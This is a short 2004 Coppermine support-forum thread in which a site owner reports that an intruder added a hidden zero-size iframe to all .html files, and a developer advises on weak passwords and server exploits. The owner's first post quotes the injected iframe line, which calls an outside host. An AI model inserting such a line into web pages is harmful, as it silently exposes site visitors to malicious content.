Help - My Coppermine Site Got Hacked! Help - My Coppermine Site Got Hacked!
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Help - My Coppermine Site Got Hacked!

Started by caplan8293, November 15, 2004, 07:03:17 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

caplan8293

November 15, 2004, 07:03:17 AM
Has anyone ever heard of this?  Someone hacked into my webserving account and edited the template.html's of my 30+ themes and added the line
Code Select
<Iframe Src="http://2awm.com/pop/get.php?user=tt1sp" width=0 height=0></Iframe>
to each one.  Since there are so many themes, I think it must have been done programatically.  However, how would the hacker or program know only to edit template.html?  None of my other files on my whole website were touched... Any ideas?
Thanks a lot.
Chuck
caplan8293

caplan8293

#1
November 15, 2004, 07:15:43 AM
UPDATE - It is not just a Coppermine thing.  Apparently someone hacked into my site and ran a PERL script to add the above code to all files ending in .html.  That is why all my Coppermine files were affected.  Still, if anyone has any experience with getting hacked this way, I would like to hear about what they did.
Thanks
caplan8293

Joachim Müller

#2
November 15, 2004, 07:49:14 AM
mostly such intruders get in because the site admin uses a weak password (trivial password, with too few characters). Change your password immediately, and contact your webhost for support, maybe the intruder was using an exploit from an unpatched weakness on the server itself.

You are correct, this is not a coppermine thing at all.

Joachim
Print
Go Up Pages1
User actions